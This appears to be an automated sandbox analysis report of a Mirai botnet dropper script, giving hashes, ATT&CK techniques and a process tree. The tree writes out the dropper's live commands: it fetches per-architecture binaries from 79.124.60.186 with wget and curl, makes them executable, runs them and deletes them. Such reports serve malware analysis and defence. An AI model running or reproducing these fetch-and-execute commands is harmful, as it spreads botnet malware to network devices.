mirai | 48f59527a700f3e75a01be9f0cf94f058e9a28a549864856116300f58cc93e13

Analysis

max time kernel
149s
max time network
150s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240508-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240508-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
27-12-2024 09:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

real.sh
Size

2KB
MD5

3c80f90e2189bbcb7dfaa459d3a98882
SHA1

f523a037d1cb6f1333e082a4e702b565ddf6f8e7
SHA256

48f59527a700f3e75a01be9f0cf94f058e9a28a549864856116300f58cc93e13
SHA512

7b35ddc719c140ae3807f8514a84eef890b47cde8777d53c9e933d61dade32b8e51683b6ca58f46e6a3c71e1aea04cb8954c16258367e563bef9529cc1352f37

Score

10^/10

mirai botnet defense_evasion discovery

Malware Config

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai
Contacts a large (226065) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

File and Directory Permissions Modification 1 TTPs 22 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1582	chmod
1587	chmod
1606	chmod
1532	chmod
1547	chmod
1571	chmod
1575	chmod
1597	chmod
1602	chmod
1520	chmod
1537	chmod
1551	chmod
1556	chmod
1592	chmod
1616	chmod
1626	chmod
1527	chmod
1542	chmod
1561	chmod
1566	chmod
1611	chmod
1621	chmod

Executes dropped EXE 2 IoCs

ioc	pid	Process
/tmp/telnet.x86	1521	telnet.x86
/tmp/telnet.x86	1576	telnet.x86

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	telnet.x86
File opened for modification	/dev/misc/watchdog	telnet.x86
File opened for modification	/dev/watchdog	telnet.x86
File opened for modification	/dev/misc/watchdog	telnet.x86

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1609	rm
1550	wget
1552	telnet.mips
1554	rm
1605	curl
1607	telnet.mips

Writes file to tmp directory 20 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/telnet.arm6	wget
File opened for modification	/tmp/telnet.arm6	curl
File opened for modification	/tmp/telnet.m68k	curl
File opened for modification	/tmp/telnet.mpsl	curl
File opened for modification	/tmp/telnet.spc	curl
File opened for modification	/tmp/telnet.arm	wget
File opened for modification	/tmp/telnet.ppc	wget
File opened for modification	/tmp/telnet.arm5	curl
File opened for modification	/tmp/telnet.arm7	curl
File opened for modification	/tmp/telnet.mips	curl
File opened for modification	/tmp/telnet.x86	wget
File opened for modification	/tmp/telnet.arm7	wget
File opened for modification	/tmp/telnet.x86	curl
File opened for modification	/tmp/telnet.sh4	curl
File opened for modification	/tmp/telnet.arm5	wget
File opened for modification	/tmp/telnet.mips	wget
File opened for modification	/tmp/telnet.mpsl	wget
File opened for modification	/tmp/telnet.sh4	wget
File opened for modification	/tmp/telnet.arm	curl
File opened for modification	/tmp/telnet.ppc	curl

/tmp/real.sh
/tmp/real.sh
1⤵
PID:1515
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.x86
  2⤵
  - Writes file to tmp directory
  PID:1516
- /bin/chmod
  chmod 777 telnet.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1520
- /tmp/telnet.x86
  ./telnet.x86 realtek
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  PID:1521
- /bin/rm
  rm -rf telnet.x86
  2⤵
  PID:1523
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm
  2⤵
  - Writes file to tmp directory
  PID:1526
- /bin/chmod
  chmod 777 telnet.arm
  2⤵
  - File and Directory Permissions Modification
  PID:1527
- /tmp/telnet.arm
  ./telnet.arm realtek
  2⤵
  PID:1528
- /bin/rm
  rm -rf telnet.arm
  2⤵
  PID:1530
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/chmod
  chmod 777 telnet.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1532
- /tmp/telnet.arm5
  ./telnet.arm5 realtek
  2⤵
  PID:1533
- /bin/rm
  rm -rf telnet.arm5
  2⤵
  PID:1535
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:1536
- /bin/chmod
  chmod 777 telnet.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1537
- /tmp/telnet.arm6
  ./telnet.arm6 realtek
  2⤵
  PID:1538
- /bin/rm
  rm -rf telnet.arm6
  2⤵
  PID:1540
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:1541
- /bin/chmod
  chmod 777 telnet.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1542
- /tmp/telnet.arm7
  ./telnet.arm7 realtek
  2⤵
  PID:1543
- /bin/rm
  rm -rf telnet.arm7
  2⤵
  PID:1545
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.m68k
  2⤵
  PID:1546
- /bin/chmod
  chmod 777 telnet.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1547
- /tmp/telnet.m68k
  ./telnet.m68k realtek
  2⤵
  PID:1548
- /bin/rm
  rm -rf telnet.m68k
  2⤵
  PID:1549
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1550
- /bin/chmod
  chmod 777 telnet.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1551
- /tmp/telnet.mips
  ./telnet.mips realtek
  2⤵
  - System Network Configuration Discovery
  PID:1552
- /bin/rm
  rm -rf telnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:1554
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/chmod
  chmod 777 telnet.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1556
- /tmp/telnet.mpsl
  ./telnet.mpsl realtek
  2⤵
  PID:1557
- /bin/rm
  rm -rf telnet.mpsl
  2⤵
  PID:1559
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:1560
- /bin/chmod
  chmod 777 telnet.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1561
- /tmp/telnet.ppc
  ./telnet.ppc realtek
  2⤵
  PID:1562
- /bin/rm
  rm -rf telnet.ppc
  2⤵
  PID:1564
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:1565
- /bin/chmod
  chmod 777 telnet.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1566
- /tmp/telnet.sh4
  ./telnet.sh4 realtek
  2⤵
  PID:1567
- /bin/rm
  rm -rf telnet.sh4
  2⤵
  PID:1569
- /usr/bin/wget
  wget http://79.124.60.186/bins/telnet.spc
  2⤵
  PID:1570
- /bin/chmod
  chmod 777 telnet.spc
  2⤵
  - File and Directory Permissions Modification
  PID:1571
- /tmp/telnet.spc
  ./telnet.spc realtek
  2⤵
  PID:1572
- /bin/rm
  rm -rf telnet.spc
  2⤵
  PID:1573
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.x86
  2⤵
  - Writes file to tmp directory
  PID:1574
- /bin/chmod
  chmod 777 telnet.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1575
- /tmp/telnet.x86
  ./telnet.x86 realtek
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  PID:1576
- /bin/rm
  rm -rf telnet.x86
  2⤵
  PID:1578
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm
  2⤵
  - Writes file to tmp directory
  PID:1581
- /bin/chmod
  chmod 777 telnet.arm
  2⤵
  - File and Directory Permissions Modification
  PID:1582
- /tmp/telnet.arm
  ./telnet.arm realtek
  2⤵
  PID:1583
- /bin/rm
  rm -rf telnet.arm
  2⤵
  PID:1585
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm5
  2⤵
  - Writes file to tmp directory
  PID:1586
- /bin/chmod
  chmod 777 telnet.arm5
  2⤵
  - File and Directory Permissions Modification
  PID:1587
- /tmp/telnet.arm5
  ./telnet.arm5 realtek
  2⤵
  PID:1588
- /bin/rm
  rm -rf telnet.arm5
  2⤵
  PID:1590
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm6
  2⤵
  - Writes file to tmp directory
  PID:1591
- /bin/chmod
  chmod 777 telnet.arm6
  2⤵
  - File and Directory Permissions Modification
  PID:1592
- /tmp/telnet.arm6
  ./telnet.arm6 realtek
  2⤵
  PID:1593
- /bin/rm
  rm -rf telnet.arm6
  2⤵
  PID:1595
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.arm7
  2⤵
  - Writes file to tmp directory
  PID:1596
- /bin/chmod
  chmod 777 telnet.arm7
  2⤵
  - File and Directory Permissions Modification
  PID:1597
- /tmp/telnet.arm7
  ./telnet.arm7 realtek
  2⤵
  PID:1598
- /bin/rm
  rm -rf telnet.arm7
  2⤵
  PID:1600
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.m68k
  2⤵
  - Writes file to tmp directory
  PID:1601
- /bin/chmod
  chmod 777 telnet.m68k
  2⤵
  - File and Directory Permissions Modification
  PID:1602
- /tmp/telnet.m68k
  ./telnet.m68k realtek
  2⤵
  PID:1603
- /bin/rm
  rm -rf telnet.m68k
  2⤵
  PID:1604
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1605
- /bin/chmod
  chmod 777 telnet.mips
  2⤵
  - File and Directory Permissions Modification
  PID:1606
- /tmp/telnet.mips
  ./telnet.mips realtek
  2⤵
  - System Network Configuration Discovery
  PID:1607
- /bin/rm
  rm -rf telnet.mips
  2⤵
  - System Network Configuration Discovery
  PID:1609
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1610
- /bin/chmod
  chmod 777 telnet.mpsl
  2⤵
  - File and Directory Permissions Modification
  PID:1611
- /tmp/telnet.mpsl
  ./telnet.mpsl realtek
  2⤵
  PID:1612
- /bin/rm
  rm -rf telnet.mpsl
  2⤵
  PID:1614
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.ppc
  2⤵
  - Writes file to tmp directory
  PID:1615
- /bin/chmod
  chmod 777 telnet.ppc
  2⤵
  - File and Directory Permissions Modification
  PID:1616
- /tmp/telnet.ppc
  ./telnet.ppc realtek
  2⤵
  PID:1617
- /bin/rm
  rm -rf telnet.ppc
  2⤵
  PID:1619
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.sh4
  2⤵
  - Writes file to tmp directory
  PID:1620
- /bin/chmod
  chmod 777 telnet.sh4
  2⤵
  - File and Directory Permissions Modification
  PID:1621
- /tmp/telnet.sh4
  ./telnet.sh4 realtek
  2⤵
  PID:1622
- /bin/rm
  rm -rf telnet.sh4
  2⤵
  PID:1624
- /usr/bin/curl
  curl -O http://79.124.60.186/bins/telnet.spc
  2⤵
  - Writes file to tmp directory
  PID:1625
- /bin/chmod
  chmod 777 telnet.spc
  2⤵
  - File and Directory Permissions Modification
  PID:1626
- /tmp/telnet.spc
  ./telnet.spc realtek
  2⤵
  PID:1627
- /bin/rm
  rm -rf telnet.spc
  2⤵
  PID:1628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

Network Service Discovery

T1046

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/telnet.x86

Filesize
71KB

MD5
9ced588aec0ba67ad8f01ce3ea50cbfa

SHA1
d5ac11a2ae0c717a79279db0046dd6b34c706895

SHA256
e690a79a215ba4e23fd294dd13ae1065adfbdee259b9b8657e6851fdd912e7e8

SHA512
849f0762220471058e3775e748a510b2f17bec7ecb76bdece52e29b5eb7060aa4596978fcc93602ea19b96cd4f305d7c71823c5a886878deb0096b96d0a26312

Download Submit